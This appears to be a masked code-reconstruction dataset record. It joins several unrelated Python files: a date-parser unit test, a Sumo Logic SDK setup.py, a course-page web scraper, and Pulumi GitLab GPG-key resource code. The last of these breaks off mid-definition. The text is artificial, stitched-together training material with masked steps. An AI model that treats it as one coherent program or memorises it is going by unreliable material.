"step-5": "\"\"\"\nTests for parsers.py\n\n@author Kevin Wilson <[email protected]>\n\"\"\"\nimport crisis.parsers as undertest\n\nimport datetime\nimport unittest\n\nclass TestParsers(unittest.TestCase):\n\tdef test_parse_date(self):\n\t\tdate = '8/5/2013 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date(date))\n\n\tdef test_part_date_short(self):\n\t\tdate = '8/5/13 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date_short(date))\n\n\tdef test_parse_line(self):\n\t\tline = [\"1\",\"2\",\"3\"]\n\t\tactual = undertest.parse_line(line)\n\t\texpected = [1,2,3]\n\t\tself.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\nif __name__ == '__main__':\n\tunittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from setuptools import setup, find_packages
from os.path import join, dirname, abspath
import io
here = abspath(dirname(__file__))
with open(join(here, 'VERSION')) as VERSION_FILE:
__versionstr__ = VERSION_FILE.read().strip()
with open(join(here, 'requirements.txt')) as REQUIREMENTS:
INSTALL_REQUIRES = REQUIREMENTS.read().split('\n')
with io.open(join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name="sumologic-sdk",
version=__versionstr__,
packages=find_packages(),
install_requires=INSTALL_REQUIRES,
# PyPI metadata
author="SumoLogic, Yoway Buorn, Melchi Salins",
author_email="[email protected], [email protected], [email protected]",
description="Sumo Logic Python SDK",
license="PSF",
long_description=long_description,
long_description_content_type='text/markdown',
keywords="sumologic python sdk rest api log management analytics logreduce security siem collector forwarder",
url="https://github.com/SumoLogic/sumologic-python-sdk",
zip_safe=True
)
|
normal
|
{
"blob_id": "8d5978bc579115eb3065dce1bae08f1790f2d83c",
"index": 2832,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n",
"step-3": "<mask token>\nhere = abspath(dirname(__file__))\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n",
"step-4": "from setuptools import setup, find_packages\nfrom os.path import join, dirname, abspath\nimport io\nhere = abspath(dirname(__file__))\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='sumologic-sdk', version=__versionstr__, packages=find_packages(\n ), install_requires=INSTALL_REQUIRES, author=\n 'SumoLogic, Yoway Buorn, Melchi Salins', author_email=\n '[email protected], [email protected], [email protected]',\n description='Sumo Logic Python SDK', license='PSF', long_description=\n long_description, long_description_content_type='text/markdown',\n keywords=\n 'sumologic python sdk rest api log management analytics logreduce security siem collector forwarder'\n , url='https://github.com/SumoLogic/sumologic-python-sdk', zip_safe=True)\n",
"step-5": "from setuptools import setup, find_packages\nfrom os.path import join, dirname, abspath\nimport io\n\nhere = abspath(dirname(__file__))\n\nwith open(join(here, 'VERSION')) as VERSION_FILE:\n __versionstr__ = VERSION_FILE.read().strip()\n\n\nwith open(join(here, 'requirements.txt')) as REQUIREMENTS:\n INSTALL_REQUIRES = REQUIREMENTS.read().split('\\n')\n\n\nwith io.open(join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"sumologic-sdk\",\n version=__versionstr__,\n packages=find_packages(),\n install_requires=INSTALL_REQUIRES,\n # PyPI metadata\n author=\"SumoLogic, Yoway Buorn, Melchi Salins\",\n author_email=\"[email protected], [email protected], [email protected]\",\n description=\"Sumo Logic Python SDK\",\n license=\"PSF\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n keywords=\"sumologic python sdk rest api log management analytics logreduce security siem collector forwarder\",\n url=\"https://github.com/SumoLogic/sumologic-python-sdk\",\n zip_safe=True\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def parse_detail_for_one_course(page, course, no_info_course):
print(f"{course['name']} is processing**: {course['url']}")
map = {'Locatie': 'location', 'Location': 'location', 'Startdatum':
'effective_start_date', 'Start date': 'effective_start_date',
'Duur': 'duration_desc', 'Wekelijkse studie': 'duration_desc',
'Expensive': 'duration_desc', 'Colleges': 'consecutive_desc',
'Languages': 'languages', 'Languages ': 'languages', 'Talen':
'languages', 'Fee': 'price', 'Fee ': 'price', 'Fairy ': 'price',
'Weekly study': 'second_duration_desc', 'Accreditations ':
'third_duration_desc', 'Investering': 'price'}
info = {'location': '', 'effective_start_date': '', 'duration_desc': '',
'consecutive_desc': '', 'languages': '', 'price': '',
'second_duration_desc': '', 'third_duration_desc': ''}
info_div = page.find('div', attrs={'class': 'program-general-info'})
info_sessions = None
if info_div:
info_sessions = info_div.find_all('div', attrs={'class': 'info-item'})
if not info_sessions:
print(f"-------{course['url']} not div")
no_info_course.append(course)
elif info_sessions:
for info_session in info_sessions:
try:
label = info_session.find('label')
label_text = label.text.strip()
info_attr = map.get(label_text, '')
if 'Wekeli' in label_text:
info_attr = 'duration_desc'
elif 'Permanente educatie' in label_text:
continue
elif 'Accreditaties' in label_text:
continue
elif 'Deadline voor aanmelding' in label_text:
continue
res = info_session.find('div')
res_text = res.text.strip()
info[info_attr] = res_text
except Exception as e:
print(f"{course['url']} has problem of {e}")
continue
detail = {**course, **info}
return detail
<|reserved_special_token_1|>
def parse_detail_for_one_course(page, course, no_info_course):
print(f'{course["name"]} is processing**: {course["url"]}')
map = {"Locatie": "location",
"Location": "location",
"Startdatum": "effective_start_date",
"Start date": "effective_start_date",
"Duur": "duration_desc",
"Wekelijkse studie": "duration_desc",
"Expensive": "duration_desc",
"Colleges": "consecutive_desc",
"Languages": "languages",
"Languages ": "languages",
"Talen": "languages",
"Fee": "price",
"Fee ": "price",
"Fairy ": "price",
"Weekly study": "second_duration_desc",
"Accreditations ": "third_duration_desc",
"Investering": "price"}
info = {"location": "",
"effective_start_date": "",
"duration_desc": "",
"consecutive_desc": "",
"languages": "",
"price": "",
"second_duration_desc": "",
"third_duration_desc": ""}
info_div = page.find('div', attrs={"class": "program-general-info"})
info_sessions = None
if info_div:
info_sessions = info_div.find_all('div', attrs={"class": "info-item"})
if not info_sessions:
print(f'-------{course["url"]} not div')
no_info_course.append(course)
elif info_sessions:
for info_session in info_sessions:
try:
label = info_session.find('label')
label_text = label.text.strip()
info_attr = map.get(label_text, '')
if "Wekeli" in label_text:
info_attr = "duration_desc"
elif "Permanente educatie" in label_text:
continue
elif "Accreditaties" in label_text:
continue
elif "Deadline voor aanmelding" in label_text:
continue
res = info_session.find('div')
res_text = res.text.strip()
info[info_attr] = res_text
except Exception as e:
print(f'{course["url"]} has problem of {e}')
continue
# print(title)
detail = {**course, **info}
# pprint(detail)
return detail
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/collegereeks-excellent-leiderschap")
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/behavioral-and-cultural-governance")
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/advanced-management-program")
# page = requests.get("https://www.nyenrode.nl/opleidingen/p/mba-thesis")
# course = {"name": "",
# "url": ""}
# page = page.text
# page = bs4.BeautifulSoup(page, 'html.parser')
#
# detail = get_detail_for_one_course(page, course, [])
# pprint(detail)
|
flexible
|
{
"blob_id": "0f4fa9f8835ae22032af9faa6c7cb10af3facd79",
"index": 5389,
"step-1": "<mask token>\n",
"step-2": "def parse_detail_for_one_course(page, course, no_info_course):\n print(f\"{course['name']} is processing**: {course['url']}\")\n map = {'Locatie': 'location', 'Location': 'location', 'Startdatum':\n 'effective_start_date', 'Start date': 'effective_start_date',\n 'Duur': 'duration_desc', 'Wekelijkse studie': 'duration_desc',\n 'Expensive': 'duration_desc', 'Colleges': 'consecutive_desc',\n 'Languages': 'languages', 'Languages ': 'languages', 'Talen':\n 'languages', 'Fee': 'price', 'Fee ': 'price', 'Fairy ': 'price',\n 'Weekly study': 'second_duration_desc', 'Accreditations ':\n 'third_duration_desc', 'Investering': 'price'}\n info = {'location': '', 'effective_start_date': '', 'duration_desc': '',\n 'consecutive_desc': '', 'languages': '', 'price': '',\n 'second_duration_desc': '', 'third_duration_desc': ''}\n info_div = page.find('div', attrs={'class': 'program-general-info'})\n info_sessions = None\n if info_div:\n info_sessions = info_div.find_all('div', attrs={'class': 'info-item'})\n if not info_sessions:\n print(f\"-------{course['url']} not div\")\n no_info_course.append(course)\n elif info_sessions:\n for info_session in info_sessions:\n try:\n label = info_session.find('label')\n label_text = label.text.strip()\n info_attr = map.get(label_text, '')\n if 'Wekeli' in label_text:\n info_attr = 'duration_desc'\n elif 'Permanente educatie' in label_text:\n continue\n elif 'Accreditaties' in label_text:\n continue\n elif 'Deadline voor aanmelding' in label_text:\n continue\n res = info_session.find('div')\n res_text = res.text.strip()\n info[info_attr] = res_text\n except Exception as e:\n print(f\"{course['url']} has problem of {e}\")\n continue\n detail = {**course, **info}\n return detail\n",
"step-3": "def parse_detail_for_one_course(page, course, no_info_course):\n print(f'{course[\"name\"]} is processing**: {course[\"url\"]}')\n map = {\"Locatie\": \"location\",\n \"Location\": \"location\",\n \"Startdatum\": \"effective_start_date\",\n \"Start date\": \"effective_start_date\",\n \"Duur\": \"duration_desc\",\n \"Wekelijkse studie\": \"duration_desc\",\n \"Expensive\": \"duration_desc\",\n \"Colleges\": \"consecutive_desc\",\n \"Languages\": \"languages\",\n \"Languages \": \"languages\",\n \"Talen\": \"languages\",\n \"Fee\": \"price\",\n \"Fee \": \"price\",\n \"Fairy \": \"price\",\n \"Weekly study\": \"second_duration_desc\",\n \"Accreditations \": \"third_duration_desc\",\n \"Investering\": \"price\"}\n\n info = {\"location\": \"\",\n \"effective_start_date\": \"\",\n \"duration_desc\": \"\",\n \"consecutive_desc\": \"\",\n \"languages\": \"\",\n \"price\": \"\",\n \"second_duration_desc\": \"\",\n \"third_duration_desc\": \"\"}\n\n info_div = page.find('div', attrs={\"class\": \"program-general-info\"})\n info_sessions = None\n if info_div:\n info_sessions = info_div.find_all('div', attrs={\"class\": \"info-item\"})\n\n if not info_sessions:\n print(f'-------{course[\"url\"]} not div')\n no_info_course.append(course)\n elif info_sessions:\n for info_session in info_sessions:\n try:\n label = info_session.find('label')\n label_text = label.text.strip()\n info_attr = map.get(label_text, '')\n if \"Wekeli\" in label_text:\n info_attr = \"duration_desc\"\n elif \"Permanente educatie\" in label_text:\n continue\n elif \"Accreditaties\" in label_text:\n continue\n elif \"Deadline voor aanmelding\" in label_text:\n continue\n res = info_session.find('div')\n res_text = res.text.strip()\n info[info_attr] = res_text\n except Exception as e:\n print(f'{course[\"url\"]} has problem of {e}')\n continue\n # print(title)\n detail = {**course, **info}\n # pprint(detail)\n return detail\n\n\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/collegereeks-excellent-leiderschap\")\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/behavioral-and-cultural-governance\")\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/advanced-management-program\")\n# page = requests.get(\"https://www.nyenrode.nl/opleidingen/p/mba-thesis\")\n# course = {\"name\": \"\",\n# \"url\": \"\"}\n# page = page.text\n# page = bs4.BeautifulSoup(page, 'html.parser')\n#\n# detail = get_detail_for_one_course(page, course, [])\n# pprint(detail)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
@pulumi.input_type
class _UserGpgKeyState:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:
Optional[pulumi.ResourceOptions]=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,
pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.
__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.
get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError(
'Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError(
'__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'
)
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__['key'] = key
__props__.__dict__['user_id'] = user_id
__props__.__dict__['created_at'] = None
__props__.__dict__['key_id'] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,
opts)
@staticmethod
def get(resource_name: str, id: pulumi.Input[str], opts: Optional[
pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str
]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[
pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None
) ->'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)
)
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__['created_at'] = created_at
__props__.__dict__['key'] = key
__props__.__dict__['key_id'] = key_id
__props__.__dict__['user_id'] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@property
@pulumi.getter
def key(self) ->pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@property
@pulumi.getter(name='keyId')
def key_id(self) ->pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
@property
@pulumi.getter(name='userId')
def user_id(self) ->pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,
key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.
Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, 'created_at', created_at)
if key is not None:
pulumi.set(__self__, 'key', key)
if key_id is not None:
pulumi.set(__self__, 'key_id', key_id)
if user_id is not None:
pulumi.set(__self__, 'user_id', user_id)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, 'created_at', value)
@property
@pulumi.getter
def key(self) ->Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, 'key', value)
@property
@pulumi.getter(name='keyId')
def key_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
<|reserved_special_token_0|>
@property
@pulumi.getter(name='userId')
def user_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, 'user_id', value)
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:
Optional[pulumi.ResourceOptions]=None):
"""
The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=""\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----""\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,
pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.
__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.
ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,
user_id: Optional[pulumi.Input[int]]=None, __props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.
get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError(
'Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError(
'__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'
)
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__['key'] = key
__props__.__dict__['user_id'] = user_id
__props__.__dict__['created_at'] = None
__props__.__dict__['key_id'] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,
opts)
@staticmethod
def get(resource_name: str, id: pulumi.Input[str], opts: Optional[
pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str
]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[
pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None
) ->'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)
)
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__['created_at'] = created_at
__props__.__dict__['key'] = key
__props__.__dict__['key_id'] = key_id
__props__.__dict__['user_id'] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@property
@pulumi.getter
def key(self) ->pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@property
@pulumi.getter(name='keyId')
def key_id(self) ->pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
@property
@pulumi.getter(name='userId')
def user_id(self) ->pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, 'user_id')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pulumi.input_type
class UserGpgKeyArgs:
<|reserved_special_token_0|>
@property
@pulumi.getter
def key(self) ->pulumi.Input[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,
key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.
Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, 'created_at', created_at)
if key is not None:
pulumi.set(__self__, 'key', key)
if key_id is not None:
pulumi.set(__self__, 'key_id', key_id)
if user_id is not None:
pulumi.set(__self__, 'user_id', user_id)
@property
@pulumi.getter(name='createdAt')
def created_at(self) ->Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, 'created_at')
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, 'created_at', value)
@property
@pulumi.getter
def key(self) ->Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, 'key')
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, 'key', value)
@property
@pulumi.getter(name='keyId')
def key_id(self) ->Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, 'key_id')
@key_id.setter
def key_id(self, value: Optional[pulumi.Input[int]]):
